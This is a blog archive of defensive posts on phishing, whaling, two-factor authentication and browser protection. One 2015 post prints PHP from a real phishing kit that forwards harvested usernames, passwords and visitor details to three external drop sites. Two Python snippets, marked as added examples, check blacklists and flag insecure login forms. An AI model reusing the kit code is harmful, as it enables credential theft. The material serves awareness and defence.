Tag Archives: Phishing

A lesson in Phishing and Two Factor Authentication

13 August 2017

The post ‘Hackers Hijack Popular Chrome Extension to Inject Code into Web Developers’ Browsers’, published on August 3, 2017 by Graham Cluley at the Tripwire blog ‘The State Of Security’, gives another good reason for the use of Two Factor Authentication.

Since phishing emails keep getting better, it is not surprising that even professionals can be tricked.

Thus I can fully accept the developer’s answer ‘I stupidly fell for a phishing attack on my Google account.’ to the question ‘Any idea how this could have happened?’.

But I cannot understand why the Google account was not secured with Two Factor Authentication (TFA), in particular because Google’s Push Notification makes life with TFA really easy.

With TFA enabled, this cyber attack could have been prevented.

Have a great week, and activate TFA for your Google account.

German firms lost millions of euros in ‘CEO Fraud’ scam: BSI

23 July 2017

The report ‘German firms lost millions of euros in ‘CEO Fraud’ scam: BSI’, published in the Reuters Technology News on 10 July 2017, really worries me. Whaling, a special form of spear phishing aimed at corporate executives, is not new at all. For some samples see this slide show on CIO.com.

It appears to me that in Germany the first line of defense, the employees, is not adequately prepared for detecting and correctly handling phishing attacks, even though anti-phishing training is the most effective and cost-efficient defensive measure in the fight against all kinds of phishing.

In addition, some rules are helpful and should be communicated to all employees:

  1. Users should never act on a business request from a company executive if the email is not signed with a company-owned and valid email certificate.
  2. Users should never trust an email of a business partner if it is not signed with the partner's valid email certificate.

The technical implementation is very easy, so even SMBs can use email signing in their daily communication.

Have a great week.

Whaling emerges as major cybersecurity threat

3 December 2016

Whaling is a type of cyber fraud that mainly targets corporate executives. It is closely related to phishing and therefore not new. For a superb collection of examples see this slide show published on CIO.com.

As always, the combination of People, Process and Technology measures (PPT approach) is the best way to combat whaling:

People. The most effective way to deal with whaling is security awareness training. Include some whaling attacks in your anti-phishing training to raise awareness.

Processes. Enhance your information handling policy (IHP) or office manual. Add rules for the compliant handling of business requests by email:

  1. Users should never act on a business request from a company executive if the email is not signed with a company-owned and valid email certificate.
  2. Never trust an email of a business partner when it is not signed with the partner's valid email certificate.

Communicate the IHP to all users and train them in the use and handling of email certificates.

Technology. Configure your email system such that all mails to external partners and at least all emails from company executives are signed with a valid email certificate.

With this, the risk of becoming the victim of a whaling attack is greatly reduced.

Have a good weekend.

NSS Labs Tests Leading Web Browsers for Secure End User Experience

6 November 2016

On November 1, 2016 NSS Labs published the 2016 Web Browser Security Comparative Test Report. Two tests with the most popular browsers (Google Chrome Version 53.0.2785, Microsoft Edge Version 38.14393.0.0 and Mozilla Firefox Version 48.0.2) were run to check how effectively they deal with socially engineered malware (SEM) and phishing attacks. The results are of interest for end users because the browsers' built-in protection features were evaluated in the test.

When it comes to protection against phishing attacks, the time it takes until a URL is blocked is important. Microsoft Edge is the browser of choice, followed by Firefox and Chrome.

In the second test the protection against Socially Engineered Malware was evaluated. Again, the average time to block the malware is of great importance, and again, Microsoft Edge is the browser of choice, followed by Chrome and Firefox. The average time to block is 0.16 hours for Microsoft Edge, 2.66 hours for Chrome and 3.76 hours for Firefox.

Happy reading, and have a good weekend.

STOP.THINK.CONNECT

11 October 2015

The past week was full of exciting discoveries. I got some really well-crafted phishing emails. They used the same bizarre landing page design but showed a somewhat different method in POST processing. Since one of the landing sites was open for everyone, I had the chance to create a copy of the PHP procedure that processes the POST request:

…
$data = "#$user#$pass#:#$ip#$browser#$hostname";   // captured credentials plus visitor details
$sites = array("http://XXXXXX0.biz/usr.php", "http://www.XXXXXXX1.com/usr.php", "http://XXXXXXXX2.eu/usr.php");
function writeit($data, $site) {
    global $textHos;   // declared but never used in the kit
    $data = array('info' => $data);
    $options = array(
        'http' => array(
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
        ),
    );
    $context = stream_context_create($options);
    $result = file_get_contents($site, false, $context);   // the response is ignored
}
foreach ($sites as $site) {   // the same record goes to all three collection sites
    writeit($data, $site);
}

Most of the phishing sites I analyzed in the past months send an email message with username and password to the bad guys. In this case username and password are forwarded to three sites for further processing.

I checked the phishing landing pages with VirusTotal.com but found in most cases that the sites were not rated malicious. Even after 5 days only 10 of 65 scanners classified the pages as malicious or as phishing sites.

What surprised me was that most of the pages were listed in blacklist databases. Check the landing page in a phishing mail with e.g. IP INDETAIL. It's very likely that the site is already listed on a blacklist.

And it’s really remarkable that browsers do not check blacklists before they direct the user to a phishing site. Information for making the world a safer place is abundant, unfortunately no one seems to be interested in creating actionable knowledge from it.
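The blacklist check described above, automated against a DNS-based URI blacklist, as an added example that is not part of the original post. It assumes SURBL's public multi.surbl.org zone and the bit values SURBL documents for its answers; the URL it queries is constructed and the domain reduction is a simplification.

```python
import socket
from urllib.parse import urlsplit

SURBL_ZONE = "multi.surbl.org"
# Bit values of the last octet per SURBL's public documentation (assumption:
# verify against the current list description before relying on them).
SURBL_BITS = {8: "PH (phishing)", 16: "MW (malware)", 64: "ABUSE", 128: "CR (cracked)"}

def registered_domain(url):
    """Reduce a URL to the domain form SURBL lists. Simplification: the last
    two labels, or three when the second-level label is a common ccTLD zone
    such as co.uk; a real implementation would use the public suffix list."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    labels = host.split(".")
    second_level = ("co", "com", "org", "net", "ac", "gov")
    keep = 3 if len(labels) >= 3 and labels[-2] in second_level else 2
    return ".".join(labels[-keep:])

def query_name(url, zone=SURBL_ZONE):
    """Name to resolve: the registered domain prefixed to the list zone."""
    return f"{registered_domain(url)}.{zone}"

def decode_listing(answer):
    """Map a 127.0.0.x answer to list names; an empty list means not listed."""
    octets = answer.split(".")
    if len(octets) != 4 or octets[:3] != ["127", "0", "0"]:
        return []
    flags = int(octets[3])
    return [name for bit, name in SURBL_BITS.items() if flags & bit]

def lookup(url):
    """Live check. Returns the list names, or None when the name does not
    resolve, which covers both 'not listed' (NXDOMAIN) and 'no DNS'."""
    try:
        return decode_listing(socket.gethostbyname(query_name(url)))
    except socket.gaierror:
        return None

if __name__ == "__main__":
    # Constructed URL in the style of the drop sites above; it is not listed.
    print(query_name("http://www.drop-site.example/usr.php"))
    print(lookup("http://www.drop-site.example/usr.php"))
```

SURBL answers queries from your own resolver; lookups routed through large public resolvers may be refused, so run this from a network with its own DNS.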

But there were also bright spots. I learned of the STOP.THINK.CONNECT campaign of the Anti-Phishing Working Group (APWG) and the National Cyber Security Alliance (NCSA). The campaign's slogan is ‘Keeping the web a safer place for everyone’. The campaign provides lots of information about Two Factor Authentication and tips for safe usage of the internet. Take a look at the funny video clips.

Take care, and have a good week.

Mail apps facilitate phishing attacks

2 October 2015

Yesterday I received a really well-crafted phishing mail:

Phishing mail viewed in the Windows Phone Mail app

When viewed with mail apps on smartphones or tablets, these well-made phishing mails look like the real thing.

Viewed with MS Outlook or a web mail client, the sender information in the header makes it crystal clear that this email is a phishing attempt:

Phishing mail viewed in Outlook

In my opinion most phishing attacks would be easy to detect if email apps offered the option to display at least the full From: field from the email header.

It’s hard to understand why Google, Apple and Microsoft make their customers' lives more difficult than necessary.

Have a good weekend!

Firefox Browser Console provides valuable hints on Phishing Sites

11 July 2015

When a serious company requests login data, the network connection is always secured. A clear indicator of a secured network connection is that the URL starts with the https protocol. In addition, the certificate information next to the URL provides reliable information about the company and the site which runs the service.

Secure Connection Indicators

The missing https protocol and certificate information in phishing URLs like http://videoservicesmiami.com/bolu/HOTMAILFILES/HOTMAILFILES/login.srf.htm is a clear indicator that someone is trying to trick you.

The Firefox Browser Console is a useful little helper in identifying phishing sites. Programmers use an input box of type password when they ask for a password. Based on this, the Firefox developers defined a simple rule:

Password fields present on an insecure (http://) page are a security risk.

When Firefox loads a phishing site, the code on the site is inspected. Firefox detects an input box of type password and outputs a warning on the Browser Console because the network connection is not secured:

Firefox Browser Console Security Warning

I would appreciate it if the Firefox developers warned users about such security risks with a message box and blocked the loading of such sites. This would be a great step forward because malicious URLs are often difficult to recognize in emails.
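The Firefox rule quoted above, reimplemented offline as an added example (not Firefox's own code); it also flags the related case of an https page whose login form posts to an http address. The page URL and HTML are constructed, not taken from the site in the post.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class LoginFormScanner(HTMLParser):
    """Collect (action_url, has_password_field) for every form on a page."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            # relative actions resolve against the page, so they inherit its scheme
            self._current = [urljoin(self.page_url, a.get("action", "")), False]
        elif tag == "input" and a.get("type", "").lower() == "password":
            if self._current is None:
                # a password field outside any form still marks a login prompt
                self.forms.append((self.page_url, True))
            else:
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None

def insecure_login_warnings(page_url, html):
    """Firefox's rule: password field on http://, or a form on https:// posting to http://."""
    scanner = LoginFormScanner(page_url)
    scanner.feed(html)
    scanner.close()
    page_insecure = urlsplit(page_url).scheme != "https"
    warnings = []
    for action, has_pw in scanner.forms:
        if not has_pw:
            continue
        if page_insecure:
            warnings.append(f"password field on insecure page {page_url}")
        elif urlsplit(action).scheme != "https":
            warnings.append(f"password form on {page_url} submits to insecure {action}")
    return warnings

# Constructed phishing-style login page; the real URL from the post is not used.
PHISH_URL = "http://phish.example/HOTMAILFILES/login.srf.htm"
PHISH_HTML = """<html><body><form action="post.php" method="post">
<input name="login" type="text"><input name="passwd" type="password">
<input type="submit" value="Sign in"></form></body></html>"""
```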

Take care!

Nomination for the “Most-Slanting-Phishing-Site-of-the-Year” award

10 July 2015

I am receiving about 20 phishing mails a week. Most attackers invest a lot of effort in their counterfeits, but sometimes they overshoot the mark. My July candidate for the Most-Slanting-Phishing-Site-of-the-Year award is:

Most-Slanting-Phishing-Site-of-the-Year award – July 2015 candidate

Earlier this week the Italian company Hacking Team was hacked. The attackers made more than 400GB of confidential company data available to the public. The leaked data included tools and exploits provided by the company to carry out attacks, among them a new Flash Player zero day affecting Flash Player up to version 18.0.0.194.

Two critical vulnerabilities in as many weeks; that’s really annoying. The problem with the latest Flash Player attacks is that the payload is hidden in Flash Player SWF files. Thus, basically every SWF file might carry a malicious payload…

… It’s definitely time to solve the Flash Player problems once and for all.

Have a good weekend.

Some thoughts about ‘Mitigation strategies for data-wiping malware’

21 May 2015

In the article ‘Mitigation strategies for data-wiping malware’, published on Security Think Tank in January 2015, Peter Wenham talks about mitigation strategies for data-wiping malware.

Peter’s proposals for creating a prevention strategy, training and strict refusal of local administrator access for employees, can be implemented quickly and at a fair price.

To complement this, companies should add a trusted zone concept for administrative tasks. A server administrator should never sign in to a server from a system at a lower trust level, e.g. from the laptop he uses to connect to a server from outside the company network. A trusted admin zone concept will prevent the lateral movement of attackers within the company network once they have gained access, e.g. through a phishing attack and a RAT (Remote Access Trojan).

Have a good day!

Phishing is the attack vector #1.

18 April 2015

In the report ‘“Phishing email” the key to hacking of TV5 Monde’, published 14 April 2015 on thelocal.fr, we read:

“According to a source close to the investigation cited by Europe 1, the hack started with a “phishing” email that was sent to all journalists at the TV channel at the end of January.

Three journalists responded, allowing the hackers to infiltrate the channel’s system using so-called “Trojan Horse” malware (malicious software).”

You may remember the Anthem cyber-attack some weeks ago. The credentials of five employees were phished and used by the cyber attackers to steal millions of customer data sets. Cyber-attacks very often start with phishing emails. Even if only a few employees respond, it always ends up in a catastrophe.

Would risk management have prevented the TV5 Monde attack? Definitely not!

In the TV5 Monde case it is very likely that the Trojan Horse would have been detected by a properly configured anti-malware scanner on the mail-in server. For details please see my post ‘Free email providers are preferred distribution channels for malware’.

@Mr. Oettinger. It’s time to start a truly useful European initiative:

‘Email providers shall run an in-depth scan of every email when it is posted to the mail-in server. If an email contains a malicious object, it must be rejected!’

It is very likely that the TV5 Monde attack could have been prevented if a next-generation firewall had been used to run an in-depth scan of the phishing mails.

Have a good weekend!

This morning in my garden.